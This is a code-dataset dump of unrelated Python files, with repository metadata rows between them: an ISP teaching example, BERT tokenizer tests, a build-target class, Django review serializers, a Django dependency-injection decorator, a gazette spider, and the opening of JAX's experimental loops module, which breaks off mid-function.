| 95
| 0.581981
|
4a050397033246bf229246395dd2ba79c96bb089
| 1,484
|
py
|
Python
|
SOLID/es2/isp_step2.py
|
nick87ds/MaterialeSerate
|
51627e47ff1d3c3ecfc9ce6741c04b91b3295359
|
[
"MIT"
] | 12
|
2021-12-12T22:19:52.000Z
|
2022-03-18T11:45:17.000Z
|
SOLID/es2/isp_step2.py
|
nick87ds/MaterialeSerate
|
51627e47ff1d3c3ecfc9ce6741c04b91b3295359
|
[
"MIT"
] | 1
|
2022-03-23T13:58:33.000Z
|
2022-03-23T14:05:08.000Z
|
SOLID/es2/isp_step2.py
|
nick87ds/MaterialeSerate
|
51627e47ff1d3c3ecfc9ce6741c04b91b3295359
|
[
"MIT"
] | 7
|
2021-02-01T22:09:14.000Z
|
2021-06-22T08:30:16.000Z
|
"""
E se aggiungiamo un altro metodo all'interfaccia IShape, come draw_triangle()?
"""
class IShape:
    """Fat 'shape' interface used to demonstrate an ISP violation.

    Every implementer is forced to provide all four draw methods, even
    when it can only sensibly draw one figure -- this is the design the
    surrounding lesson text critiques.
    """

    def draw_square(self):
        raise NotImplementedError

    def draw_rectangle(self):
        raise NotImplementedError

    def draw_circle(self):
        raise NotImplementedError

    def draw_triangle(self):
        raise NotImplementedError
"""
Le classi devono implementare il nuovo metodo o verrà generato un errore.
Vediamo che è impossibile implementare una forma che possa disegnare un
cerchio ma non un rettangolo o un quadrato o un triangolo.
Possiamo solo implementare i metodi generando un errore che mostra
che l'operazione non può essere eseguita.
L'ISP disapprova il design di questa interfaccia IShape.
I clients (qui Rectangle, Circle e Square) non dovrebbero essere costretti
a dipendere da metodi di cui non hanno bisogno o di cui non fanno uso.
Inoltre, l'ISP afferma che le interfacce dovrebbero eseguire un solo lavoro
(come il principio SRP) ogni ulteriore raggruppamento di comportamenti
dovrebbe essere rimosso e assegnato ad un'altra interfaccia.
Qui, la nostra interfaccia IShape esegue azioni che dovrebbero essere gestite
in modo indipendente da altre interfacce.
Per rendere la nostra interfaccia IShape conforme al principio ISP, segreghiamo
le azioni su diverse interfacce.
Le classi (cerchio, rettangolo, quadrato, triangolo, ecc.) possono
semplicemente ereditare dall'interfaccia IShape e implementare il proprio
comportamento.
"""
| 32.977778
| 79
| 0.789084
|
4a0503c3ed6999e3bd81aec4de8f7d64ec733bd9
| 5,406
|
py
|
Python
|
official/nlp/bert/tokenization_test.py
|
873040/Abhishek
|
2ddd716e66bc5cc6e6f0787508dd07da0e02e75a
|
[
"Apache-2.0"
] | 153
|
2020-10-25T13:58:04.000Z
|
2022-03-07T06:01:54.000Z
|
official/nlp/bert/tokenization_test.py
|
873040/Abhishek
|
2ddd716e66bc5cc6e6f0787508dd07da0e02e75a
|
[
"Apache-2.0"
] | 11
|
2020-07-13T08:29:00.000Z
|
2022-03-24T07:21:09.000Z
|
official/nlp/bert/tokenization_test.py
|
873040/Abhishek
|
2ddd716e66bc5cc6e6f0787508dd07da0e02e75a
|
[
"Apache-2.0"
] | 23
|
2020-10-25T14:44:47.000Z
|
2021-03-31T02:12:13.000Z
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import six
import tensorflow as tf
from official.nlp.bert import tokenization
class TokenizationTest(tf.test.TestCase):
  """Tokenization test.

  The implementation is forked from
  https://github.com/google-research/bert/blob/master/tokenization_test.py."
  """

  def test_full_tokenizer(self):
    # End-to-end: vocab file on disk -> FullTokenizer -> tokens -> ids.
    vocab_tokens = [
        "[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn",
        "##ing", ","
    ]
    with tempfile.NamedTemporaryFile(delete=False) as vocab_writer:
      if six.PY2:
        vocab_writer.write("".join([x + "\n" for x in vocab_tokens]))
      else:
        # Python 3 requires bytes for a binary NamedTemporaryFile.
        vocab_writer.write("".join([x + "\n" for x in vocab_tokens
                                   ]).encode("utf-8"))

      vocab_file = vocab_writer.name

    tokenizer = tokenization.FullTokenizer(vocab_file)
    os.unlink(vocab_file)

    tokens = tokenizer.tokenize(u"UNwant\u00E9d,running")
    self.assertAllEqual(tokens, ["un", "##want", "##ed", ",", "runn", "##ing"])

    self.assertAllEqual(
        tokenizer.convert_tokens_to_ids(tokens), [7, 4, 5, 10, 8, 9])

  def test_chinese(self):
    # CJK characters must each become their own token.
    tokenizer = tokenization.BasicTokenizer()

    self.assertAllEqual(
        tokenizer.tokenize(u"ah\u535A\u63A8zz"),
        [u"ah", u"\u535A", u"\u63A8", u"zz"])

  def test_basic_tokenizer_lower(self):
    # Lower-casing also strips accents (e.g. \u00E9 -> e).
    tokenizer = tokenization.BasicTokenizer(do_lower_case=True)

    self.assertAllEqual(
        tokenizer.tokenize(u" \tHeLLo!how  \n Are yoU?  "),
        ["hello", "!", "how", "are", "you", "?"])
    self.assertAllEqual(tokenizer.tokenize(u"H\u00E9llo"), ["hello"])

  def test_basic_tokenizer_no_lower(self):
    # Case must be preserved when do_lower_case is off.
    tokenizer = tokenization.BasicTokenizer(do_lower_case=False)

    self.assertAllEqual(
        tokenizer.tokenize(u" \tHeLLo!how  \n Are yoU?  "),
        ["HeLLo", "!", "how", "Are", "yoU", "?"])

  def test_basic_tokenizer_no_split_on_punc(self):
    # With split_on_punc disabled, punctuation stays attached to words.
    tokenizer = tokenization.BasicTokenizer(
        do_lower_case=True, split_on_punc=False)

    self.assertAllEqual(
        tokenizer.tokenize(u" \tHeLLo!how  \n Are yoU?  "),
        ["hello!how", "are", "you?"])

  def test_wordpiece_tokenizer(self):
    # Greedy longest-match-first subword splitting against a tiny vocab.
    vocab_tokens = [
        "[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn",
        "##ing", "##!", "!"
    ]

    vocab = {}
    for (i, token) in enumerate(vocab_tokens):
      vocab[token] = i
    tokenizer = tokenization.WordpieceTokenizer(vocab=vocab)

    self.assertAllEqual(tokenizer.tokenize(""), [])

    self.assertAllEqual(
        tokenizer.tokenize("unwanted running"),
        ["un", "##want", "##ed", "runn", "##ing"])

    self.assertAllEqual(
        tokenizer.tokenize("unwanted running !"),
        ["un", "##want", "##ed", "runn", "##ing", "!"])

    self.assertAllEqual(
        tokenizer.tokenize("unwanted running!"),
        ["un", "##want", "##ed", "runn", "##ing", "##!"])

    # A word with no full subword cover maps to [UNK].
    self.assertAllEqual(
        tokenizer.tokenize("unwantedX running"), ["[UNK]", "runn", "##ing"])

  def test_convert_tokens_to_ids(self):
    vocab_tokens = [
        "[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn",
        "##ing"
    ]

    vocab = {}
    for (i, token) in enumerate(vocab_tokens):
      vocab[token] = i

    self.assertAllEqual(
        tokenization.convert_tokens_to_ids(
            vocab, ["un", "##want", "##ed", "runn", "##ing"]), [7, 4, 5, 8, 9])

  def test_is_whitespace(self):
    # \u00A0 is a non-breaking space and must count as whitespace.
    self.assertTrue(tokenization._is_whitespace(u" "))
    self.assertTrue(tokenization._is_whitespace(u"\t"))
    self.assertTrue(tokenization._is_whitespace(u"\r"))
    self.assertTrue(tokenization._is_whitespace(u"\n"))
    self.assertTrue(tokenization._is_whitespace(u"\u00A0"))

    self.assertFalse(tokenization._is_whitespace(u"A"))
    self.assertFalse(tokenization._is_whitespace(u"-"))

  def test_is_control(self):
    self.assertTrue(tokenization._is_control(u"\u0005"))

    # Whitespace and printable characters are not control characters.
    self.assertFalse(tokenization._is_control(u"A"))
    self.assertFalse(tokenization._is_control(u" "))
    self.assertFalse(tokenization._is_control(u"\t"))
    self.assertFalse(tokenization._is_control(u"\r"))
    self.assertFalse(tokenization._is_control(u"\U0001F4A9"))

  def test_is_punctuation(self):
    self.assertTrue(tokenization._is_punctuation(u"-"))
    self.assertTrue(tokenization._is_punctuation(u"$"))
    self.assertTrue(tokenization._is_punctuation(u"`"))
    self.assertTrue(tokenization._is_punctuation(u"."))

    self.assertFalse(tokenization._is_punctuation(u"A"))
    self.assertFalse(tokenization._is_punctuation(u" "))
if __name__ == "__main__":
  # Discover and run all tf.test.TestCase classes defined in this module.
  tf.test.main()
| 33.57764
| 80
| 0.642249
|
4a0504385eab48722f836062cf1488feb079777d
| 3,729
|
py
|
Python
|
ligament/buildtarget.py
|
Archived-Object/ligament
|
ff3d78130522676a20dc64086dc8a27b197cc20f
|
[
"Apache-2.0"
] | 1
|
2015-07-22T15:27:40.000Z
|
2015-07-22T15:27:40.000Z
|
ligament/buildtarget.py
|
Archived-Object/ligament
|
ff3d78130522676a20dc64086dc8a27b197cc20f
|
[
"Apache-2.0"
] | null | null | null |
ligament/buildtarget.py
|
Archived-Object/ligament
|
ff3d78130522676a20dc64086dc8a27b197cc20f
|
[
"Apache-2.0"
] | null | null | null |
from buildcontext import DeferredDependency
from helpers import pdebug, indent_text
class BuildTarget(object):
    """An action in ligament.

    BuildTargets exist within build contexts
    (see ligament.buildcontext.Context).

    Tasks extending BuildTarget are expected to pass the keyword argument
    ``data_dependencies`` up from their declaration.
    """

    @property
    def name(self):
        """The name this target was registered under, or ``"<unnamed>"``."""
        return (self._name
                if self._name is not None
                else "<unnamed>")

    @name.setter
    def name(self, name):
        self._name = name

    def __init__(self,
                 data_dependencies=None):
        """Create a build target.

        Args:
            data_dependencies: dict of names -> (DeferredDependency or plain
                values).  When a build is requested, the DeferredDependencies
                are evaluated and the resulting dict is passed as kwargs to
                ``self.build()``.  For example::

                    SomeBuildTarget(
                        data_dependencies={
                            "foo": DeferredDependency("bar"),
                            "baz": DeferredDependency("quod"),
                            "bul": 4
                        })

                means that ``SomeBuildTarget.build`` is called with kwargs::

                    SomeBuildTarget.build(
                        foo=<value of bar>,
                        baz=<value of quod>,
                        bul=4)
        """
        # Fix: use a None sentinel instead of a mutable {} default so that
        # instances never share one dict object.  Passing {} explicitly is
        # still accepted and behaves exactly as before.
        self.data_dependencies = (
            {} if data_dependencies is None else data_dependencies)

        # The name of this task in its registered build context.
        self._name = None

        # The build context this target is registered with.
        self.context = None

        # The list of files this build target wants to be notified of.
        self.file_watch_targets = []

    def register_with_context(self, myname, context):
        """Registers this build target (exclusively) with a given context."""
        if self.context is not None:
            raise Exception("attempted to register BuildTarget with multiple "
                            "BuildContexts")

        context.register_task(myname, self)
        self._name = myname
        self.context = context

        # Wire each deferred dependency back to this target and register the
        # edge in the context's dependency graph.
        for key in self.data_dependencies:
            if type(self.data_dependencies[key]) is DeferredDependency:
                self.data_dependencies[key].parent = myname
                self.data_dependencies[key].context = context
                for target_name in self.data_dependencies[key].target_names:
                    context.register_dependency(target_name, myname)

    def resolve_dependencies(self):
        """Evaluate each data dependency of this build target.

        Returns:
            dict mapping each dependency name to its plain value
            (DeferredDependency entries are resolved; others pass through).
        """
        return {
            key: (value.resolve()
                  if type(value) is DeferredDependency
                  else value)
            for key, value in self.data_dependencies.items()}

    def resolve_and_build(self):
        """Resolves the dependencies of this build target and builds it."""
        pdebug("resolving and building task '%s'" % self.name,
               groups=["build_task"])
        indent_text(indent="++2")
        toret = self.build(**self.resolve_dependencies())
        indent_text(indent="--2")
        return toret

    def build(self):
        """(abstract) Perform some task and return the result.

        Also assigns the value of ``self.file_watch_targets``.
        """
        raise Exception("build not implemented for %s" % type(self))

    def update_build(self, changedfiles):
        """(abstract) Updates the task given a list of changed files."""
        raise Exception("update_build not implemented for %s" % type(self))
| 35.855769
| 78
| 0.590507
|
4a05059e0ca2833b3a0b7c13b5bcb9c1b74be015
| 2,157
|
py
|
Python
|
django/apps/review/serializers.py
|
wykys/project-thesaurus
|
f700396b30ed44e6b001c15397a25450ac068af4
|
[
"MIT"
] | null | null | null |
django/apps/review/serializers.py
|
wykys/project-thesaurus
|
f700396b30ed44e6b001c15397a25450ac068af4
|
[
"MIT"
] | 93
|
2020-05-19T18:14:12.000Z
|
2022-03-29T00:26:39.000Z
|
django/apps/review/serializers.py
|
wykys/project-thesaurus
|
f700396b30ed44e6b001c15397a25450ac068af4
|
[
"MIT"
] | 1
|
2020-11-21T20:24:35.000Z
|
2020-11-21T20:24:35.000Z
|
from django.utils.translation import gettext_lazy as _
from rest_framework.exceptions import ValidationError
from rest_framework.fields import DateTimeField, CurrentUserDefault, HiddenField
from rest_framework.relations import PrimaryKeyRelatedField, HyperlinkedIdentityField
from rest_framework.serializers import ModelSerializer
from apps.accounts.serializers import UserSerializer
from apps.review.models import Review
from apps.thesis.models import Thesis
class ReviewPublicSerializer(ModelSerializer):
    """Serializer for the publicly visible fields of a thesis review."""
    # Thesis under review, submitted by primary key.
    thesis = PrimaryKeyRelatedField(
        queryset=Thesis.objects.get_queryset(),
        style=dict(base_template='input.html'),
    )
    # Review author: expanded on read, auto-filled from the request on write.
    user = UserSerializer(read_only=True)
    user_id = HiddenField(default=CurrentUserDefault(), source='user', write_only=True)
    # Link to the rendered PDF detail view of this review.
    url = HyperlinkedIdentityField(view_name='api:review-pdf-detail')
    created = DateTimeField(read_only=True, format=None)

    class Meta:
        model = Review
        fields = (
            'id',
            'url',
            'thesis',
            'user',
            'user_id',
            'difficulty',
            'grades',
            'grade_proposal',
            'created',
        )

    def validate(self, attrs):
        """Object-level check that this user may post a review for this thesis.

        Rejects the payload unless the thesis is ready for review, the user is
        its supervisor or opponent, and the user has not already posted a
        review (excluding the instance being updated, if any).
        """
        thesis = attrs.get('thesis')
        # On update keep the original author; on create use the request user.
        user = self.context.get('request').user if not self.instance else self.instance.user
        if not (
                thesis.state == Thesis.State.READY_FOR_REVIEW and
                user in (thesis.supervisor, thesis.opponent) and
                not Review.objects.filter(
                    thesis=thesis,
                    user=user
                ).exclude(
                    # Exclude self so editing an existing review still validates.
                    id=self.instance.id if self.instance else None
                ).exists()
        ):
            raise ValidationError(_('Review has been already posted by this user or this user is not allowed to post '
                                    'review for this thesis.'))
        return attrs
class ReviewFullInternalSerializer(ReviewPublicSerializer):
    """Internal variant that additionally exposes the review text fields."""
    class Meta(ReviewPublicSerializer.Meta):
        # Extend the public field set with internal-only content.
        fields = ReviewPublicSerializer.Meta.fields + (
            'comment',
            'questions',
        )
| 33.703125
| 118
| 0.632823
|
4a050648c0f9f883708317d807464d4d2e5d105c
| 9,217
|
py
|
Python
|
django_autowired/autowired.py
|
yangyuecho/django-autowired
|
fbbd2e706813eff25916b308156a5f771bc44b51
|
[
"MIT"
] | null | null | null |
django_autowired/autowired.py
|
yangyuecho/django-autowired
|
fbbd2e706813eff25916b308156a5f771bc44b51
|
[
"MIT"
] | null | null | null |
django_autowired/autowired.py
|
yangyuecho/django-autowired
|
fbbd2e706813eff25916b308156a5f771bc44b51
|
[
"MIT"
] | null | null | null |
import functools
import json
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Set
from typing import Type
from django.http.request import HttpRequest
from django.http.response import HttpResponse
from django.http.response import JsonResponse
from django.views import View
from django_autowired import params
from django_autowired.dependency.models import Dependant
from django_autowired.dependency.utils import DependantUtils
from django_autowired.exceptions import APIException
from django_autowired.exceptions import RequestValidationError
from django_autowired.typing import BodyType
from django_autowired.utils import BodyConverter
from pydantic import BaseModel
from pydantic import ValidationError
from pydantic.error_wrappers import ErrorWrapper
from pydantic.fields import ModelField
ViewFunc = Callable
def _prepare_response_content(
    content: Any,
    *,
    exclude_unset: bool = False,
    exclude_defaults: bool = False,
    exclude_none: bool = False,
) -> Any:
    """Recursively convert pydantic models inside *content* into plain dicts.

    Lists and dicts are walked element by element; any other value is
    returned unchanged.
    """
    def _recurse(item: Any) -> Any:
        # Re-enter with the same exclusion flags for nested containers.
        return _prepare_response_content(
            item,
            exclude_unset=exclude_unset,
            exclude_defaults=exclude_defaults,
            exclude_none=exclude_none,
        )

    if isinstance(content, BaseModel):
        return content.dict(
            by_alias=True,
            exclude_unset=exclude_unset,
            exclude_defaults=exclude_defaults,
            exclude_none=exclude_none,
        )
    if isinstance(content, list):
        return [_recurse(element) for element in content]
    if isinstance(content, dict):
        return {key: _recurse(value) for key, value in content.items()}
    # Scalars and unknown types pass through untouched.
    return content
def serialize_response(
    *,
    response_content: Any,
    field: Optional[ModelField] = None,
    include: Optional[Set[str]] = None,
    exclude: Optional[Set[str]] = None,
    by_alias: bool = True,
) -> Any:
    """Validate *response_content* against *field* and dump it to plain data.

    Without a *field* the content is returned as-is.  Raises pydantic
    ``ValidationError`` when the content does not match the response model.
    """
    if not field:
        # No response model declared: pass the payload through untouched.
        return response_content

    prepared = _prepare_response_content(content=response_content)
    validated, raw_errors = field.validate(prepared, {}, loc=("response",))

    collected = []
    if isinstance(raw_errors, ErrorWrapper):
        collected.append(raw_errors)
    elif isinstance(raw_errors, list):
        collected.extend(raw_errors)
    if collected:
        raise ValidationError(collected, field.type_)

    dumped = validated.dict(by_alias=by_alias, include=include, exclude=exclude)
    # Custom-root models wrap their payload under "__root__"; unwrap it.
    if "__root__" in dumped:
        return dumped["__root__"]
    return dumped
class ViewRoute(object):
    """Precomputed routing metadata for one autowired view function.

    Built once at decoration time: resolves the view's dependency tree,
    derives the expected request-body field, and prepares the response
    model/serialization settings used on every call.
    """

    def __init__(
        self,
        view_func: ViewFunc,
        status_code: int = 200,
        dependencies: Optional[List[params.Depends]] = None,
        response_model: Optional[Type[Any]] = None,
        response_class: Optional[Type[HttpResponse]] = None,
        response_model_include: Optional[Set[str]] = None,
        response_model_exclude: Optional[Set[str]] = None,
        response_model_by_alias: bool = True,
    ) -> None:
        self._view_func = view_func
        self._dependencies = dependencies or []
        self._dependant = Dependant.new_dependant(call=view_func, is_view_func=True)
        # Prepend extra decorator-level dependencies (in reverse so the
        # declared order is preserved) ahead of the view's own dependencies.
        for depends in self._dependencies[::-1]:
            self._dependant.dependencies.insert(
                0,
                self._dependant.new_paramless_sub_dependant(depends=depends),
            )
        # Used to give the generated body/response models unique names.
        self._unique_id = str(view_func)
        self._body_field = self._dependant.get_body_field(name=self._unique_id)
        # Form bodies are parsed differently from JSON bodies at call time.
        self._is_body_form = bool(
            self._body_field and isinstance(self._body_field.field_info, params.Form)
        )
        self._response_model = response_model
        self._response_class = response_class or JsonResponse
        if self._response_model:
            response_name = "Response_" + self._unique_id
            self._response_field = DependantUtils.create_model_field(
                name=response_name, type_=self._response_model
            )
            # Cloned so response filtering doesn't mutate the declared model.
            self._cloned_response_field = DependantUtils.create_cloned_field(
                field=self._response_field,
            )
        else:
            self._response_field = None
            self._cloned_response_field = None
        self._status_code = status_code

    @property
    def dependant(self) -> Dependant:
        """Root of the resolved dependency tree for this view."""
        return self._dependant

    @property
    def is_body_form(self) -> bool:
        """True when the request body should be parsed as form data."""
        return self._is_body_form

    @property
    def body_field(self) -> Optional[ModelField]:
        """Pydantic field describing the expected request body, if any."""
        return self._body_field

    @property
    def response_field(self) -> Optional[ModelField]:
        """Cloned response-model field used to validate view output."""
        return self._cloned_response_field

    @property
    def status_code(self) -> int:
        """HTTP status code used for serialized (non-HttpResponse) results."""
        return self._status_code
class Autowired(object):
    """Decorator factory that injects validated request data into Django views.

    Calling an instance returns a decorator; the decorator precomputes a
    ViewRoute for the view and wraps it so that, per request, the body is
    parsed, dependencies are solved, and the result is serialized.
    """

    def __init__(self) -> None:
        # TODO
        # Maps each decorated view function to its precomputed ViewRoute.
        self._view_route: Dict[ViewFunc, ViewRoute] = {}

    def __call__(
        self,
        description: Optional[str] = None,
        dependencies: Optional[List[params.Depends]] = None,
        status_code: int = 200,
        response_model: Optional[Type[Any]] = None,
        response_class: Type[HttpResponse] = JsonResponse,
        response_model_include: Optional[Set[str]] = None,
        response_model_exclude: Optional[Set[str]] = None,
        response_model_by_alias: bool = True,
    ) -> ViewFunc:
        def decorator(func: ViewFunc) -> ViewFunc:
            # TODO
            # Build the route once, at decoration time.
            route = ViewRoute(
                view_func=func,
                dependencies=dependencies,
                status_code=status_code,
                response_model=response_model,
                response_class=response_class,
                response_model_include=response_model_include,
                response_model_exclude=response_model_exclude,
                response_model_by_alias=response_model_by_alias,
            )
            self._view_route[func] = route
            body_field = route.body_field
            is_body_form = route.is_body_form

            def inner(*args, **kwargs) -> Any:
                """
                When called, the method will identify and inject the dependency
                """
                dependant = self._view_route[func].dependant
                view_func = func
                if dependant.ismethod:
                    # class-based view: args are (self, request, ...)
                    view_self = args[0]
                    view_func = functools.partial(func, view_self)
                    view_request: HttpRequest = args[1]
                    # view_args = args[2:]
                else:
                    # function view: args are (request, ...)
                    view_request = args[0]
                    # view_args = args[1:]
                # parse the request body, if the view declares one
                try:
                    body: Optional[BodyType] = None
                    if body_field:
                        if is_body_form:
                            body = BodyConverter.to_form(request=view_request)
                        else:
                            body = BodyConverter.to_json(request=view_request)
                except json.JSONDecodeError as e:
                    # Surface malformed JSON as a structured validation error.
                    raise RequestValidationError(
                        [ErrorWrapper(exc=e, loc=("body", e.pos))], body=e.doc
                    )
                except Exception:
                    raise APIException(detail="parse body error", status_code=422)
                # Solve the dependency tree against request, body and path kwargs.
                solved_result = dependant.solve_dependencies(
                    request=view_request,
                    body=body,
                    path_kwargs=kwargs,
                    is_body_form=is_body_form,
                )
                values, errors = solved_result
                if errors:
                    # design after
                    raise RequestValidationError(errors=errors, body=body)
                raw_response = view_func(**values)
                if isinstance(raw_response, HttpResponse):
                    # The view built its own response; pass it through.
                    return raw_response
                else:
                    # Validate/serialize against the declared response model.
                    response_data = serialize_response(
                        response_content=raw_response,
                        field=route.response_field,
                        include=response_model_include,
                        exclude=response_model_exclude,
                        by_alias=response_model_by_alias,
                    )
                    response = response_class(response_data, status=status_code)
                    return response

            return inner

        return decorator
# Module-level singleton used as the `@autowired(...)` decorator everywhere.
autowired = Autowired()
class ClassView(View):
    """Demo class-based view showing `@autowired` applied to a method."""
    @autowired(description="this is post method")
    def post(self, request, a: int, b: str, c):
        print(self, request, a, b, c)

    # @autowired(description="this is put method")
    def put(self, request):
        pass
@autowired(description="this is func view")
def func_view(request):
    """Demo function-based view decorated with `@autowired`."""
    pass
if __name__ == "__main__":
    # Ad-hoc smoke test: call the decorated method with dummy arguments
    # (1 stands in for the request positional).
    v = ClassView()
    v.post(1, a=1, b="1", c="1")
| 33.035842
| 85
| 0.596289
|
4a0507eb00b9fb5d3b1f74e4a954275a678925f5
| 193
|
py
|
Python
|
data_collection/gazette/spiders/sc_guaramirim.py
|
Jefersonalves/diario-oficial
|
9a4bdfe2e31414c993d88831a67160c49a5ee657
|
[
"MIT"
] | 3
|
2021-08-18T17:50:31.000Z
|
2021-11-12T23:36:33.000Z
|
data_collection/gazette/spiders/sc_guaramirim.py
|
Jefersonalves/diario-oficial
|
9a4bdfe2e31414c993d88831a67160c49a5ee657
|
[
"MIT"
] | 4
|
2021-02-10T02:36:48.000Z
|
2022-03-02T14:55:34.000Z
|
data_collection/gazette/spiders/sc_guaramirim.py
|
Jefersonalves/diario-oficial
|
9a4bdfe2e31414c993d88831a67160c49a5ee657
|
[
"MIT"
] | null | null | null |
from gazette.spiders.base import FecamGazetteSpider
class ScGuaramirimSpider(FecamGazetteSpider):
    """Gazette spider for Guaramirim/SC, scraped through the FECAM portal."""
    name = "sc_guaramirim"
    # FECAM search filter selecting this municipality's entity.
    FECAM_QUERY = "cod_entidade:106"
    # IBGE territory code for Guaramirim (SC).
    TERRITORY_ID = "4206504"
| 24.125
| 51
| 0.772021
|
4a05082ab42281f21a8c09b0b0fda8296ec7f6c1
| 24,281
|
py
|
Python
|
jax/experimental/loops.py
|
iolloj/jax
|
1b80feea6acf758fd9dc3e616e8efcb8db831ce9
|
[
"Apache-2.0"
] | 17,375
|
2018-11-18T02:15:55.000Z
|
2022-03-31T23:49:46.000Z
|
jax/experimental/loops.py
|
iolloj/jax
|
1b80feea6acf758fd9dc3e616e8efcb8db831ce9
|
[
"Apache-2.0"
] | 5,018
|
2018-11-22T17:04:07.000Z
|
2022-03-31T23:36:25.000Z
|
jax/experimental/loops.py
|
abattery/jax
|
62c7744e68c66fae9faf9d8d00fea8aad4418cf3
|
[
"Apache-2.0"
] | 1,805
|
2018-11-21T10:13:53.000Z
|
2022-03-31T23:49:19.000Z
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Loops is an **experimental** module for syntactic sugar for loops and control-flow.
The current implementation should convert loops correctly to JAX internal
representation, and most transformations should work (see below), but we have
not yet fine-tuned the performance of the resulting XLA compilation!
By default, loops and control-flow in JAX are executed and inlined during tracing.
For example, in the following code the `for` loop is unrolled during JAX tracing::
arr = np.zeros(5)
for i in range(arr.shape[0]):
arr[i] += 2.
if i % 2 == 0:
arr[i] += 1.
In order to capture the structured control-flow one can use the higher-order
JAX operations, which require you to express the body of the loops and
conditionals as functions, and the array updates using a functional style that
returns an updated array, e.g.::
arr = np.zeros(5)
def loop_body(i, acc_arr):
arr1 = acc_arr.at[i].set(acc_arr[i] + 2.)
return lax.cond(i % 2 == 0,
arr1,
lambda arr1: arr1.at[i].set(arr1[i] + 1),
arr1,
lambda arr1: arr1)
arr = lax.fori_loop(0, arr.shape[0], loop_body, arr)
This API quickly gets unreadable with deeper nested loops.
With the utilities in this module you can write loops and conditionals that
look closer to plain Python, as long as you keep the loop-carried state in a
special `loops.scope` object and use `for` loops over special
`scope.range` iterators::
from jax.experimental import loops
with loops.Scope() as s:
s.arr = np.zeros(5) # Create the mutable state of the loop as `scope` fields.
for i in s.range(s.arr.shape[0]):
s.arr = s.arr.at[i].set(s.arr[i] + 2.)
for _ in s.cond_range(i % 2 == 0): # Conditionals as loops with 0 or 1 iterations
s.arr = s.arr.at[i].set(s.arr[i] + 1.)
Loops constructed with `range` must have literal constant bounds. If you need
loops with dynamic bounds, you can use the more general `while_range` iterator.
However, in that case the `grad` transformation is not supported::
s.idx = start
for _ in s.while_range(lambda: s.idx < end):
s.idx += 1
Notes:
* Loops and conditionals to be functionalized can appear only inside scopes
constructed with `loops.Scope` and they must use one of the `Scope.range`
iterators. All other loops are unrolled during tracing, as usual in JAX.
* Only scope data (stored in fields of the scope object) is functionalized.
All other state, e.g., in other Python variables, will not be considered as
being part of the loop output. All references to the mutable state should be
through the scope, e.g., `s.arr`.
* The scope fields can be pytrees, and can themselves be mutable data structures.
* Conceptually, this model is still "functional" in the sense that a loop over
a `Scope.range` behaves as a function whose input and output is the scope data.
* Scopes should be passed down to callees that need to use loop
functionalization, or they may be nested.
* The programming model is that the loop body over a `scope.range` is traced
only once, using abstract shape values, similar to how JAX traces function
bodies.
Restrictions:
* The tracing of the loop body should not exit prematurely with `return`,
`exception`, `break`. This would be detected and reported as errors when we
encounter unnested scopes.
* The loop index variable should not be used after the loop. Similarly, one
should not use outside the loop data computed in the loop body, except data
stored in fields of the scope object.
* No new mutable state can be created inside a loop to be functionalized.
All mutable state must be created outside all loops and conditionals.
* Once the loop starts all updates to loop state must be with new values of the
same abstract values as the values on loop start.
* For a `while` loop, the conditional function is not allowed to modify the
scope state. This is a checked error. Also, for `while` loops, the `grad`
transformation does not work. An alternative that allows `grad` is a bounded
loop (`range`).
Transformations:
* All transformations are supported, except `grad` is not supported for
`Scope.while_range` loops.
* `vmap` is very useful for such loops because it pushes more work into the
inner-loops, which should help performance for accelerators.
For usage example, see tests/loops_test.py.
"""
from functools import partial
import itertools
import numpy as np
import traceback
from typing import Any, Dict, List, cast
from jax import lax, core
from jax._src.lax import control_flow as lax_control_flow
from jax import tree_util
from jax import numpy as jnp
from jax.errors import UnexpectedTracerError
from jax.interpreters import partial_eval as pe
from jax._src.util import safe_map
class Scope(object):
  """A scope context manager to keep the state of loop bodies for functionalization.

  Usage::

    with Scope() as s:
      s.data = 0.
      for i in s.range(5):
        s.data += 1.
      return s.data

  """

  def __init__(self):
    # state to be functionalized, indexed by names, can be pytrees
    self._mutable_state: Dict[str, Any] = {}
    # the pytrees of abstract values; set when the loop starts.
    self._mutable_state_aval: Dict[str, core.AbstractValue] = {}

    self._active_ranges = []  # stack of active ranges, last one is the innermost.
    self._count_subtraces = 0  # How many net started subtraces, for error recovery

  def range(self, first, second=None, third=None):
    """Creates an iterator for bounded iterations to be functionalized.

    The body is converted to a `lax.scan`, for which all JAX transformations work.
    The `first`, `second`, and `third` arguments must be integer literals.

    Usage::

      range(5)  # start=0, end=5, step=1
      range(1, 5)  # start=1, end=5, step=1
      range(1, 5, 2)  # start=1, end=5, step=2

      s.out = 1.
      for i in scope.range(5):
        s.out += 1.
    """
    # Normalize the (first[, second[, third]]) overloads to start/stop/step,
    # mirroring the builtin range() calling convention.
    if third is not None:
      start = int(first)
      stop = int(second)
      step = int(third)
    else:
      step = 1
      if second is not None:
        start = int(first)
        stop = int(second)
      else:
        start = 0
        stop = int(first)
    return _BodyTracer(self, _BoundedLoopBuilder(start, stop, step))

  def cond_range(self, pred):
    """Creates a conditional iterator with 0 or 1 iterations based on the boolean.

    The body is converted to a `lax.cond`. All JAX transformations work.

    Usage::

      for _ in scope.cond_range(s.field < 0.):
        s.field = - s.field
    """
    # TODO: share these checks with lax_control_flow.cond
    if len(np.shape(pred)) != 0:
      raise TypeError(
